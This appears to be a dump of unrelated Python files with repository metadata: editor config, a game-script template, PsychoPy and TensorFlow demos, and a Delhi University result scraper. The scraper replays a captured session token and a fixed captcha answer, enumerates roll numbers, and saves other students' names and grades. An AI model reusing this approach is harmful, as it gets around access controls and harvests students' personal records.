# 'flags' list of compilation flags.
compilation_database_folder = 'build'
if os.path.exists( compilation_database_folder ):
database = ycm_core.CompilationDatabase( compilation_database_folder )
else:
database = None
SOURCE_EXTENSIONS = [ '.cpp', '.cxx', '.cc', '.c', '.m', '.mm' ]
def DirectoryOfThisScript():
return os.path.dirname( os.path.abspath( __file__ ) )
def MakeRelativePathsInFlagsAbsolute( flags, working_directory ):
if not working_directory:
return list( flags )
new_flags = []
make_next_absolute = False
path_flags = [ '-isystem', '-I', '-iquote', '--sysroot=' ]
for flag in flags:
new_flag = flag
if make_next_absolute:
make_next_absolute = False
if not flag.startswith( '/' ):
new_flag = os.path.join( working_directory, flag )
for path_flag in path_flags:
if flag == path_flag:
make_next_absolute = True
break
if flag.startswith( path_flag ):
path = flag[ len( path_flag ): ]
new_flag = path_flag + os.path.join( working_directory, path )
break
if new_flag:
new_flags.append( new_flag )
return new_flags
def IsHeaderFile( filename ):
  """Return True when *filename* has a C/C++/Objective-C header extension."""
  _, extension = os.path.splitext( filename )
  return extension in ( '.h', '.hxx', '.hpp', '.hh' )
def GetCompilationInfoForFile( filename ):
  """Look up compile flags for *filename* in the compilation database.

  CMake's compile_commands.json has no entries for header files, so for a
  header we try sibling source files with the same basename and borrow their
  flags. Returns None when no usable entry exists.
  """
  if not IsHeaderFile( filename ):
    return database.GetCompilationInfoForFile( filename )
  stem = os.path.splitext( filename )[ 0 ]
  for source_extension in SOURCE_EXTENSIONS:
    candidate = stem + source_extension
    if not os.path.exists( candidate ):
      continue
    info = database.GetCompilationInfoForFile( candidate )
    if info.compiler_flags_:
      return info
  return None
# This is the entry point; this function is called by ycmd to produce flags for
# a file.
def FlagsForFile( filename, **kwargs ):
  """Return {'flags': [...]} for *filename* (None if the database has no entry)."""
  if database:
    # Bear in mind that compilation_info.compiler_flags_ does NOT return a
    # python list, but a "list-like" StringVec object
    compilation_info = GetCompilationInfoForFile( filename )
    if not compilation_info:
      return None
    final_flags = MakeRelativePathsInFlagsAbsolute(
      compilation_info.compiler_flags_,
      compilation_info.compiler_working_dir_ )
  else:
    # No compilation database: fall back to the static 'flags' list defined
    # above, resolved relative to this script's directory.
    relative_to = DirectoryOfThisScript()
    final_flags = MakeRelativePathsInFlagsAbsolute( flags, relative_to )
  return { 'flags': final_flags }
| [
"dreisner@archlinux.org"
] | dreisner@archlinux.org |
70a410fdb55ba6085191adb8e7493ec9f4513ed9 | dff527bbd3f358f0e5bd2e261a1ace43ddec1bda | /GameplayScripts/base_script.py | 7e5392cbab9436f8ff063e107da4a8005ac38b4b | [] | no_license | 2217936322/LViewLoL | e71153806bdd4072356ac982308dd732ff1aa89b | dd699d52be34c36ecf65117a1c27463e91d60334 | refs/heads/master | 2023-04-08T07:18:04.963890 | 2021-03-18T17:21:33 | 2021-03-18T17:21:33 | 331,578,121 | 0 | 1 | null | 2021-02-09T19:59:03 | 2021-01-21T09:29:48 | null | UTF-8 | Python | false | false | 308 | py | from lview import *
# Metadata read by the LView loader: identifies this script template in the UI.
# Replace the placeholder values when deriving a concrete script.
lview_script_info = {
    "script": "<script-name>",
    "author": "<author-name>",
    "description": "<script-description>",
    "target_champ": "none"
}
def lview_load_cfg(cfg):
    """Hook: restore persisted settings from *cfg*. Stub in this template."""
    pass
def lview_save_cfg(cfg):
    """Hook: persist settings into *cfg*. Stub in this template."""
    pass
def lview_draw_settings(game, ui):
    """Hook: render this script's settings panel via *ui*. Stub in this template."""
    pass
def lview_update(game, ui):
    """Hook: called every tick with the current *game* state. Stub in this template."""
    pass
"laur.h_97@yahoo.ro"
] | laur.h_97@yahoo.ro |
788e7d9a05ef24b4d7c13c24a8099e7870593310 | f819a51511966db4366a2dba363e75b5e0476171 | /gratings.py | 6ba47d43cd66248af81d679c3c20b0c8a60726b0 | [] | no_license | jankaWIS/run_psychopy | ba68926788139d8214b04a54587d5b3e9e1ecb45 | dfaee2f3fc0f3435d6277921428bbf0fea57ec95 | refs/heads/master | 2021-05-18T15:34:04.482953 | 2020-06-17T08:36:23 | 2020-06-17T08:36:23 | 251,299,788 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 324 | py | import psychopy.visual
import psychopy.event
# Open a small 400x400 window (pixel units) on the default screen.
win = psychopy.visual.Window(
    size=[400, 400],
    units="pix",
    fullscr=False # Set to True for full screen
)
# A grating stimulus, 150x150 px, default parameters, centred in the window.
grating = psychopy.visual.GratingStim(
    win=win,
    units="pix",
    size=[150, 150]
)
# Draw to the back buffer, then flip to make it visible.
grating.draw()
win.flip()
# Block until any key is pressed, then close the window.
psychopy.event.waitKeys()
win.close()
"jan.kadlec@weizmann.ac.il"
] | jan.kadlec@weizmann.ac.il |
ac1dc5c4fb536dadca4830f3ca64e1213940035f | 13e76d26c4310f6a5d4118b778bb22b914dc8dd9 | /tfTwo/linearRegression.py | 3c04ab8e201190aaa88d8d8ed68b9254c49150af | [] | no_license | lbndpcoder/notesAtwork | ba215409d8735ab3f48bf5239f9351f9550781e9 | ab9d8026a5d9f82b62581f401853ae41cc8a6b20 | refs/heads/master | 2020-12-03T04:23:03.228461 | 2020-05-04T09:52:39 | 2020-05-04T09:52:39 | 231,199,051 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,205 | py | import numpy as np
import tensorflow as tf
print(tf.__version__)
'''
# 声明固定的参数
a = tf.constant([[1, 2]])
b = tf.constant([[1, 2]])
# 加法运算
c = tf.add(a, b)
print(c)
'''
# Targeted automatic differentiation example (kept disabled above/below).
'''
x = tf.Variable(3.)
with tf.GradientTape() as tape:
    y = tf.square(x)
y_grad = tape.gradient(y, x)
print(y_grad)
'''
# linear regression
# data
X_raw = np.array([2013, 2014, 2015, 2016, 2017], dtype=np.float32)
y_raw = np.array([12000, 14000, 15000, 16500, 17500], dtype=np.float32)
# normalization: rescale both series to [0, 1]
X = (X_raw - X_raw.min()) / (X_raw.max() - X_raw.min())
y = (y_raw - y_raw.min()) / (y_raw.max() - y_raw.min())
X = tf.constant(X)
y = tf.constant(y)
# Trainable slope/intercept, both initialised to 0.
a = tf.Variable(0.)
b = tf.Variable(0.)
variables = [a, b]
epoh = 100
# Define the optimizer (plain SGD).
optimizers = tf.keras.optimizers.SGD(learning_rate=5e-4)
for e in range(epoh):
    # Record operations for differentiation; loss = sum of squared errors.
    with tf.GradientTape() as tape:
        y_pre = a * X + b
        loss = tf.reduce_sum(tf.square(y_pre - y))
    # Differentiate the loss with respect to a and b.
    grads = tape.gradient(loss, variables)
    # The optimizer consumes (gradient, variable) pairs.
    optimizers.apply_gradients(grads_and_vars=zip(grads, variables))
print(a, b)
| [
"liubonan@liubonandeMBP.lan"
] | liubonan@liubonandeMBP.lan |
6c2fdf1f4c07cf50cf12ac55c8aa7bbf61b7a2ad | f88534befb2758f5f20d96a507950534a590f0e5 | /script/kapre_variants.py | d0c524e5ffaa0f57babbc511a4266b7adfe247cd | [
"Apache-2.0"
] | permissive | spun-oliver/waffler | 8a07ef218e1ec261da59853793792fc1605d9d93 | cd9c7590de4656389c6b9e8bf81d03eaa625f750 | refs/heads/master | 2022-01-18T16:54:09.480744 | 2019-05-17T11:49:13 | 2019-05-17T11:49:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,769 | py |
from kapre.utils import Normalization2D
import keras.backend as K
from tensorflow import atan
class FixedNormalization2D(Normalization2D):
    """
    As kapre's Normalization2D, but initialise with precomputed ('fixed') mean and std,
    rather than computing these on the batch to be normalised.
    """
    def __init__(self, **kwargs):
        # Consume 'mean'/'std' so the base-class __init__ never sees them.
        # dict.pop replaces the original read-then-del pair; it still raises
        # KeyError when either required argument is missing.
        self.mean = kwargs.pop('mean')
        self.std = kwargs.pop('std')
        super(FixedNormalization2D, self).__init__(**kwargs)

    def call(self, x, mask=None):
        # Normalise with the fixed statistics; self.eps (from the base class)
        # guards against division by zero.
        return (x - self.mean) / (self.std + self.eps)
### --- TODO: unused? ---
class Scale2D(Normalization2D):
    """
    As kapre's Normalization2D, but adds the mean back in.
    """
    def call(self, x, mask=None):
        # Standardise over all four axes (axis == -1) or over every axis
        # except the selected one, then re-add the mean so only the spread
        # is normalised while the level is preserved.
        if self.axis == -1:
            mean = K.mean(x, axis=[3, 2, 1, 0], keepdims=True)
            std = K.std(x, axis=[3, 2, 1, 0], keepdims=True)
        elif self.axis in (0, 1, 2, 3):
            all_dims = [0, 1, 2, 3]
            del all_dims[self.axis]
            mean = K.mean(x, axis=all_dims, keepdims=True)
            std = K.std(x, axis=all_dims, keepdims=True)
        # NOTE(review): any other axis value leaves mean/std unbound and
        # raises NameError on the next line — presumably unreachable; confirm.
        return ((x - mean) / (std + self.eps)) + mean
class Shift2D(Normalization2D):
    """
    As kapre's Normalization2D, but without scaling.
    """
    def call(self, x, mask=None):
        # Mean-centre only; the commented-out std lines are kept from the
        # original for reference (no division is performed).
        if self.axis == -1:
            mean = K.mean(x, axis=[3, 2, 1, 0], keepdims=True)
            # std = K.std(x, axis=[3, 2, 1, 0], keepdims=True)
        elif self.axis in (0, 1, 2, 3):
            all_dims = [0, 1, 2, 3]
            del all_dims[self.axis]
            mean = K.mean(x, axis=all_dims, keepdims=True)
            # std = K.std(x, axis=all_dims, keepdims=True)
        # NOTE(review): axis values outside {-1, 0, 1, 2, 3} leave `mean`
        # unbound and raise NameError here — confirm this is unreachable.
        return (x - mean)
| [
"owatts@staffmail.ed.ac.uk"
] | owatts@staffmail.ed.ac.uk |
b3bb36275b2d2d6a69aa66275e76d886a7bcace6 | f2bd2a3c4d8d48341cc96e7842020dd5caddff8e | /archive/DUCS-MCA-Batch-2017-2020/DU-PG-2019-4th-sem/PGMCA.py | 7bd43c71e2b9923029291dac9de842d0d69e309d | [
"MIT"
] | permissive | jatin69/du-result-fetcher | ab51684bfa9c52ffcd45edf0d9d6784f1e6fd28e | 4106810cc06b662ba53acd5853b56c865f39f1a4 | refs/heads/master | 2022-12-09T07:08:25.614765 | 2022-12-01T12:56:02 | 2022-12-01T12:56:02 | 118,005,826 | 7 | 0 | MIT | 2022-12-01T12:56:03 | 2018-01-18T16:08:03 | Python | UTF-8 | Python | false | false | 13,441 | py | # dependencies
import requests
from bs4 import BeautifulSoup
import re
import sys
import os
# Directory where fetched result pages are archived as HTML.
savePath = "html"
if not os.path.isdir(savePath):
    os.mkdir(savePath)

# link for 6th sem 2019 - new link
GradeCard = "http://duresult.in/students/Combine_GradeCard.aspx"
CONST_VIEWSTATE = """/wEPDwUJOTc3OTgxMzM3DxYEHgdjYXB0Y2hhBQYxODIyODkeCUlwQWRkcmVzcwUMMTAzLjc4LjE0OC44FgICAw9kFgwCAQ9kFgICBQ8PFgIeBFRleHQFNFJlc3VsdHMgKFNlbWVzdGVyL0FubnVhbCBFeGFtaW5hdGlvbiBNYXktSnVuZSAyMDE5IClkZAIHDw8WAh8CBRAgKE1heS1KdW5lIDIwMTkpZGQCFQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQlDT0xMX05BTUUeDkRhdGFWYWx1ZUZpZWxkBQlDT0xMX0NPREUeC18hRGF0YUJvdW5kZ2QQFX8SPC0tLS0tU2VsZWN0LS0tLS0+HEFjaGFyeWEgTmFyZW5kcmEgRGV2IENvbGxlZ2UkQWRpdGkgTWFoYXZpZGhsYXlhIChUZWFjaGluZyBDZW50cmUpE0FkaXRpIE1haGF2aWR5YWxheWElQXJ5YWJoYXR0YSBDb2xsZWdlIChUZWFjaGluZyBDZW50cmUpID1BcnlhYmhhdHRhIENvbGxlZ2UgW0Zvcm1lcmx5IFJhbSBMYWwgQW5hbmQgQ29sbGVnZSAoRXZlbmluZyldH0F0bWEgUmFtIFNhbmF0YW4gRGhhcmFtIENvbGxlZ2UYQmhhZ2luaSBOaXZlZGl0YSBDb2xsZWdlKkJoYWdpbmkgTml2ZWRpdGEgQ29sbGVnZSAoVGVhY2hpbmcgQ2VudHJlKQ9CaGFyYXRpIENvbGxlZ2UhQmhhcmF0aSBDb2xsZWdlIC0gVGVhY2hpbmcgQ2VudHJlKkJoYXNrYXJhY2hhcnlhIENvbGxlZ2Ugb2YgQXBwbGllZCBTY2llbmNlcxFDQU1QVVMgTEFXIENFTlRSRRdDYW1wdXMgb2YgT3BlbiBMZWFybmluZyJDbHVzdGVyIElubm92YXRpb24gQ2VudHJlIChDLkkuQy4pHUNvbGxlZ2UgT2YgVm9jYXRpb25hbCBTdHVkaWVzL0NvbGxlZ2Ugb2YgVm9jYXRpb25hbCBTdHVkaWVzIChUZWFjaGluZyBDZW50cmUpEkRhdWxhdCBSYW0gQ29sbGVnZRxEZWVuIERheWFsIFVwYWRoeWF5YSBDb2xsZWdlLkRlZW4gRGF5YWwgVXBhZGh5YXlhIENvbGxlZ2UgKFRlYWNoaW5nIENlbnRyZSkgRGVsaGkgQ29sbGVnZSBPZiBBcnRzICYgQ29tbWVyY2UaRGVsaGkgU2Nob29sIG9mIEpvdXJuYWxpc21kRGVwYXJ0bWVudCBvZiBCb3RhbnkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGREZXBhcnRtZW50IG9mIENoZW1pc3RyeSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgFkRlcGFydG1lbnQgb2YgQ29tbWVyY2VkRGVwYXJ0bWVudCBvZiBDb21wdXRlciBTY2llbmNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBEZXBhcnRtZW50IG9mIEVkdWNhdGlvbiAoQy5JLkUuKRVEZXBhcnRtZW50IG9mIEVuZ2xpc2gXRGVwYXJ0bWVudCBvZiBHZW9ncmFwaHkqRGVwYXJ0bWVudCBvZiBHZXJtYW5pYyBhbmQgUm9tYW5jZSBTdHVkaWVzE0RlcGFydG1lbnQgb2YgSGluZGkVRGVwYXJ0bWVudCBvZiBIaXN0b3J5G0RlcGFydG1lbnQgb2YgSGlzdG9yeSAoU0RDKS1EZXBhcnRtZW5
0IG9mIExpYnJhcnkgYW5kIEluZm9ybWF0aW9uIFNjaWVuY2VkRGVwYXJ0bWVudCBvZiBNYXRoZW1hdGljcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIBNEZXBhcnRtZW50IG9mIE11c2ljZERlcGFydG1lbnQgb2YgUGh5c2ljcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAfRGVwYXJ0bWVudCBvZiBQb2xpdGljYWwgU2NpZW5jZRZEZXBhcnRtZW50IG9mIFNhbnNrcml0ZERlcGFydG1lbnQgb2YgU29jaWFsIFdvcmsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRGVwYXJ0bWVudCBvZiBTdGF0aXN0aWNzICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGREZXBhcnRtZW50IG9mIFpvb2xvZ3kgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgGERlc2hiYW5kaHUgQ29sbGVnZSAoRGF5KStEci4gQW1iZWRrYXIgQ2VudGVyIGZvciBCaW9tZWRpY2FsIFJlc2VhcmNoI0RyLiBCLlIuIEFtYmVka2FyIChUZWFjaGluZyBDZW50cmUpHURyLiBCaGltIFJhbyBBbWJlZGthciBDb2xsZWdlNUR1cmdhYmFpIERlc2htdWtoIENvbGxlZ2Ugb2YgU3BlY2lhbCBFZHVjYXRpb24gKFYuSS4pGER5YWwgU2luZ2ggQ29sbGVnZSAoRGF5KRhEeWFsIFNpbmdoIENvbGxlZ2UgKEV2ZSkdRmFjdWx0eSBvZiBNYW5hZ2VtZW50IFN0dWRpZXMNR2FyZ2kgQ29sbGVnZRBIYW5zIFJhaiBDb2xsZWdlIkhhbnMgUmFqIENvbGxlZ2UgLSBUZWFjaGluZyBDZW50cmUNSGluZHUgQ29sbGVnZRVJLlAuQ29sbGVnZSBGb3IgV29tZW42SW5kaXJhIEdhbmRoaSBJbnN0aXR1dGUgb2YgUGh5LiBFZHUuICYgU3BvcnRzIFNjaWVuY2VzLkluc3RpdHV0ZSBvZiBDeWJlciBTZWN1cml0eSBhbmQgTGF3IChJLkMuUy5MLikbSW5zdGl0dXRlIE9mIEhvbWUgRWNvbm9taWNzG0phbmtpIERldmkgTWVtb3JpYWwgQ29sbGVnZS1KYW5raSBEZXZpIE1lbW9yaWFsIENvbGxlZ2UgLSBUZWFjaGluZyBDZW50cmUUSmVzdXMgJiBNYXJ5IENvbGxlZ2UmSmVzdXMgJiBNYXJ5IENvbGxlZ2UgLSBUZWFjaGluZyBDZW50cmUMSnViaWxlZSBIYWxsD0thbGluZGkgQ29sbGVnZSFLYWxpbmRpIENvbGxlZ2UgLSBUZWFjaGluZyBDZW50cmUTS2FtbGEgTmVocnUgQ29sbGVnZSRLZXNoYXYgTWFoYXZpZGxheWEgKFRlYWNoaW5nIENlbnRyZSkUS2VzaGF2IE1haGF2aWR5YWxheWESS2lyb3JpIE1hbCBDb2xsZWdlEkxhZHkgSXJ3aW4gQ29sbGVnZR5MYWR5IFNyaSBSYW0gQ29sbGVnZSBGb3IgV29tZW4STGFrc2htaWJhaSBDb2xsZWdlJExha3NobWliYWkgQ29sbGVnZSA
tIFRlYWNoaW5nIENlbnRyZQxMQVcgQ0VOVFJFLUkNTEFXIENFTlRSRS1JSRhNYWhhcmFqYSBBZ3Jhc2VuIENvbGxlZ2UqTWFoYXJhamEgQWdyYXNlbiBDb2xsZWdlIC0gVGVhY2hpbmcgQ2VudHJlJU1haGFyc2hpIFZhbG1pa2kgQ29sbGVnZSBvZiBFZHVjYXRpb24QTWFpdHJleWkgQ29sbGVnZSJNYWl0cmV5aSBDb2xsZWdlIC0gVGVhY2hpbmcgQ2VudHJlHU1hdGEgU3VuZHJpIENvbGxlZ2UgRm9yIFdvbWVuL01hdGEgU3VuZHJpIENvbGxlZ2UgRm9yIFdvbWVuIC0gVGVhY2hpbmcgQ2VudHJlDU1pcmFuZGEgSG91c2UfTWlyYW5kYSBIb3VzZSAoVGVhY2hpbmcgQ2VudHJlKRxNb3RpIExhbCBOZWhydSBDb2xsZWdlIChEYXkpHE1vdGkgTGFsIE5laHJ1IENvbGxlZ2UgKEV2ZSkoTW90aSBMYWwgTmVocnUgQ29sbGVnZSAoVGVhY2hpbmcgQ2VudHJlKSxOb24gQ29sbGVnaWF0ZSBXb21lbiBFZHVjYXRpb24gQm9hcmQgKE5DV0VCKRhQLkcuRC5BLlYuIENvbGxlZ2UgKERheSkYUC5HLkQuQS5WLiBDb2xsZWdlIChFdmUpJFAuRy5ELkEuVi4gQ29sbGVnZSAtIFRlYWNoaW5nIENlbnRyZRBSYWpkaGFuaSBDb2xsZWdlIlJhamRoYW5pIENvbGxlZ2UgKFRlYWNoaW5nIENlbnRyZSkbUmFtIExhbCBBbmFuZCBDb2xsZWdlIChEYXkpEVJhbWFudWphbiBDb2xsZWdlI1JhbWFudWphbiBDb2xsZWdlIChUZWFjaGluZyBDZW50cmUpDlJhbWphcyBDb2xsZWdlF1MuRy5ULkIuIEtoYWxzYSBDb2xsZWdlF1NhdHlhd2F0aSBDb2xsZWdlIChEYXkpF1NhdHlhd2F0aSBDb2xsZWdlIChFdmUpJFNhdHlhd2F0aSBDb2xsZWdlIChUZWFjaGluZyBDZW50cmUpIBdTY2hvb2wgb2YgT3BlbiBMZWFybmluZyJTaGFoZWVkIEJoYWdhdCBTaW5naCBDb2xsZWdlIChEYXkpIlNoYWhlZWQgQmhhZ2F0IFNpbmdoIENvbGxlZ2UgKEV2ZSk1U2hhaGVlZCBSYWpndXJ1IENvbGxlZ2Ugb2YgQXBwbGllZCBTY2llbmNlcyBmb3IgV29tZW4rU2hhaGVlZCBTdWtoZGV2IENvbGxlZ2Ugb2YgQnVzaW5lc3MgU3R1ZGllcw9TaGl2YWppIENvbGxlZ2UXU2h5YW0gTGFsIENvbGxlZ2UgKERheSkXU2h5YW0gTGFsIENvbGxlZ2UgKEV2ZSkxU2h5YW1hIFByYXNhZCBNdWtoZXJqZWUgQ29sbGVnZSAtIFRlYWNoaW5nIENlbnRyZShTaHlhbWEgUHJhc2FkIE11a2hlcmppIENvbGxlZ2UgZm9yIFdvbWVuFlNPTCBTdHVkeSBDZW50ZXIgU291dGgbU3JpIEF1cm9iaW5kbyBDb2xsZWdlIChEYXkpG1NyaSBBdXJvYmluZG8gQ29sbGVnZSAoRXZlKSdTcmkgQXVyb2JpbmRvIENvbGxlZ2UgKFRlYWNoaW5nIENlbnRyZSkpU3JpIEd1cnUgR29iaW5kIFNpbmdoIENvbGxlZ2UgT2YgQ29tbWVyY2U7U3JpIEd1cnUgR29iaW5kIFNpbmdoIENvbGxlZ2UgT2YgQ29tbWVyY2UgLSBUZWFjaGluZyBDZW50cmUhU3JpIEd1cnUgTmFuYWsgRGV2IEtoYWxzYSBDb2xsZWdlG1NyaSBSYW0gQ29sbGVnZSBPZiBDb21tZXJjZRhTcmkgVmVua2F0ZXN3YXJhIENvbGxlZ2UUU3QuIFN0ZXBoZW5zIENvbGxlZ2UaU3dhbWkgU2h
yYWRkaGFuYW5kIENvbGxlZ2UTVW5pdmVyc2l0eSBvZiBEZWxoaRNWaXZla2FuYW5kYSBDb2xsZWdlJVZpdmVrYW5hbmRhIENvbGxlZ2UgLSBUZWFjaGluZyBDZW50cmUaWmFraXIgSHVzYWluIENvbGxlZ2UgKEV2ZSkgWmFraXIgSHVzYWluIERlbGhpIENvbGxlZ2UgKERheSkVfxI8LS0tLS1TZWxlY3QtLS0tLT4DMDAxBDEzMTQDMDAyBDEzMTUDMDU5AzAwMwMwMDcEMTMxNwMwMDgEMTMwNwMwMDkDMzA5A0NPTAMzMTIDMDEzBDEzMTgDMDE0AzAxNQQxMzI2AzAxNgMzMTYDMjE2AzIxNwMyNDEDMjM0AzI0MwMyMDMDMjI5AzIwNAMyMDUDMjMxAzI5MQMyMDYDMjM1AzI0MAMyMjIDMjMyAzIxMwMyMzMDMjM3AzIyMwMwMTkDMzE4BDEzMTYDMDEwAzMxNAMwMjEDMDIyAzEwOQMwMjQDMDI1BDEzMTMDMDI2AzAyOQMwMjgDMzE3AzAzMAMwMzEEMTMwNAMwMzIEMTMwOAMzMDYDMDMzBDEzMDUDMDM0BDEzMTkDMDM1AzAzNgMwMzgDMDM5AzA0MAQxMzEwAzMxMAMzMTEDMDQxBDEzMDIDMzE1AzA0MwQxMzA5AzA0NAQxMzAzAzA0NwQxMzIwAzA0OAMwNDkEMTMyMQMzMDcDMDUzAzA1NAQxMzExAzA1NQQxMzIyAzA1OAMwMjAEMTMyMwMwNTYDMDY4AzA2MgMwNjMEMTMyNANTT0wDMDY0AzA2NQMwNjYDMDY3AzA3MQMwNzMDMDc0BDEzMDYDMDc1BFNPTFMDMDc2AzA3NwQxMzI1AzA3OAQxMzEyAzA2OQMwNzIDMDc5AzA4MAMwODEDMTAwAzA4NAQxMzAxAzA4NgMwODUUKwN/Z2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2RkAh0PZBYCZg9kFgICAw8PFgIeCEltYWdlVXJsBUNHZW5lcmF0ZUNhcHRjaGEuYXNweD9DYXB0Y2hhQ29kZT0xODIyODkmRGF0ZVRpbWU9NjM2OTczOTcyNzY0MDA1Nzk2ZGQCJw8PFgIeB1Zpc2libGVoZGQCLQ8PFgIfB2hkZGR2bl/3EI/pExtevTdMuWF0S/G/qQ=="""
CONST_VIEWSTATEGENERATOR = """35D4F7A9"""
CONST_EVENTVALIDATION = """/wEWhQECrP631AECq8PapwoCypTxxQ4CwPyMgQgCwfyo/goC5evuqgICwfzcmgMC6KaP6wkC/oLBtwQC4uX5gA8Cwfz0UALXj7neBwKsxZLHDgLoppvrCQLvppvrCQKewq+LCALY6+KqAgL+gsW3BALB/Ni7AgKTuKfBCQK017nqAwLa66LBDQLJzpv3BQLMzpv3BQLPzpv3BQLg5f2ADwLG/LyBCAKRuN/ACQL8gvG3BAL8gsG3BALuppPrCQKRuKPBCQKq14XqAwLG/LiBCALG/OCBCALPzuf3BQKq17HqAwKtxdr3BgLb6+aqAgLb65qqAgL8gsW3BAL8gv23BALg5fWADwL8gvm3BALopp/rCQLKj73eBwLB/MC3CAKvxa70BgKWuKfBCQLA/ISBCALl6+aqAgLpppvrCQKTuNvACQK0173qAwLB/ITFDQLJzp/3BQLoppPrCQLXj7HeBwLh5f2ADwKvxab0BgLA/LiBCAKsxdZUAuXrmqoCAqzFxq4IAszO5/cFAv6C/bcEAqzF+vEJApO438AJAsH8zNQKArTXseoDAsnOk/cFAtePtd4HAuiml+sJAq/F2vcGAsH8+NIHAqLFrvQGAsf8gIEIAsD8vIEIAqzFvp8DAqvXueoDAv6C8bcEAqzF6ksCk7jTwAkCrMWiuAgC4uXpgA8C2uva/wkC14+p3gcC6KaL6wkC2uvOmAYC4eX5gA8C/oL1twQCk7jXwAkCwfzsjwwCtNep6gMC2uvytQ8C14+t3gcCr8Wi9AYC2uvm7gcCyc6L9wUC14+h3gcC5euWqgIC/oLptwQC2uuKiwwCrsKviwgCk7jLwAkCtNet6gMCyc6P9wUC4uXhgA8CwPyogQgC/oLttwQCk7jPwAkCrMXuqgYCtNeh6gMCrsKr/gkCyc6D9wUC4uXlgA8C2uu+pAUC14+l3gcCwfyQqAUC6KaD6wkC5euKqgIC6KaH6wkCr8WK9AYCwPzsgQgCrMWq9AYCk7iDwQkCrMWK4goCyc7H9wUCtNfl6gMCtPew8AwCwJ/r5gwC75nRggMCpZ/ziwJBxkgslz2Udq2i1suw/QwLnFI92A=="""
# store marks list for all DU
college_sgpa_list = []
# list codes for all CS colleges
all_colleges = [
    "16001570001",
    "16003570001",
    "16009570001",
    "16013570001",
    "16015570001",
    "16020570001",
    "16021570001",
    "16025570001",
    "16029570001",
    "16033570001",
    "16035570001",
    "16044570001",
    "16053570001",
    "16058570001",
    "16059570001",
    "16066570001",
    "16067570001",
    "16068570001",
    "16075570001",
    "16078570001"
]
# override for one college check
# NOTE(review): this reassignment discards the full list above, so only
# "1724501" is ever queried — looks like a debug override left enabled.
all_colleges = [
    "1724501"
]
# For every college code, probe candidate roll numbers 01..49, fetch each
# grade card, archive the raw HTML, and record [rollno, name, CGPA, college].
for col in all_colleges:
    dduc = []
    # Roll numbers share the college prefix minus the last two digits.
    constantCollegePart = col[:-2]
    for i in range(1,10):
        dduc.append([constantCollegePart + '0' + str(i)])
    for i in range(10,50):
        dduc.append([constantCollegePart + str(i)])
    # testing generation of rollnos
    # print(dduc)
    # break
    # dduc = [['17015570001']]
    VAR_collegeCode = "234"
    for VAR_stud in dduc:
        VAR_rollno = VAR_stud[0]
        # print(VAR_rollno)
        # ASP.NET postback payload; the CONST_* blobs and the fixed captcha
        # value were captured from a live session.
        payload = {
            '__EVENTTARGET' : '',
            '__EVENTARGUMENT' : '',
            '__VIEWSTATE': CONST_VIEWSTATE,
            '__VIEWSTATEGENERATOR': CONST_VIEWSTATEGENERATOR,
            '__EVENTVALIDATION': CONST_EVENTVALIDATION,
            'ddlcollege' : VAR_collegeCode,
            'txtrollno' : VAR_rollno,
            'txtcaptcha' : '182289',
            'btnsearch': 'Print+Score+Card'
        }
        # infinite cookie life
        cookies = {'ASP.NET_SessionId': 'efstl5454kxusy45e35h45j1'}
        soup = None
        count = 0
        # Retry up to 5 times when the portal answers "Runtime Error".
        # NOTE(review): BeautifulSoup() never returns None, so the
        # `if(soup==None): continue` branch below is dead code.
        while(soup == None):
            r = requests.post(GradeCard, data=payload, cookies=cookies)
            # print(r.text)
            soup = BeautifulSoup(r.text, 'html.parser')
            if(soup==None):
                continue
            # print(soup.title.string)
            if(soup.title.string == "Runtime Error"):
                if count == 5:
                    break
                else:
                    count = count + 1
                    soup = None
                    continue
        if count == 5:
            continue
        # for img in soup.find_all('img'):
        # img.decompose()
        #t = soup.find('span', attrs={'id':'lblstatement'}).decompose()
        #t = soup.find('span', attrs={'id':'lbl_sub_head3'}).decompose()
        #t = soup.find('span', attrs={'id':'lbldisclaimer'}).decompose()
        # // todo
        # sgpa_table = soup.find("span", {"id": "lbl_gr_cgpa"})
        # print(soup)
        # print(college_sgpa_list)
        # Skip roll numbers with no result page (missing name/college spans).
        if soup.find("span", id="lblcollege") == None:
            continue
        if soup.find("span", id="lblname") == None:
            continue
        VAR_college = soup.find("span", id="lblcollege").text
        VAR_sname = soup.find("span", id="lblname").text
        # writing result to html file
        # NOTE(review): this rebinding shadows the module-level savePath.
        savePath = "html/"+VAR_college.replace(' ', '_')
        if not os.path.isdir(savePath):
            os.mkdir(savePath)
        VAR_filename = savePath + '/' + VAR_rollno + '__' + VAR_sname + '__' + '.html'
        with open(VAR_filename, "w") as file:
            file.write(str(soup))
        # print(VAR_college, VAR_sname);
        # total = soup.find("table", id="lblgrandtotal")
        sgpa_table = soup.find("table", {"id": "gvrslt"})
        if(sgpa_table == None ):
            continue
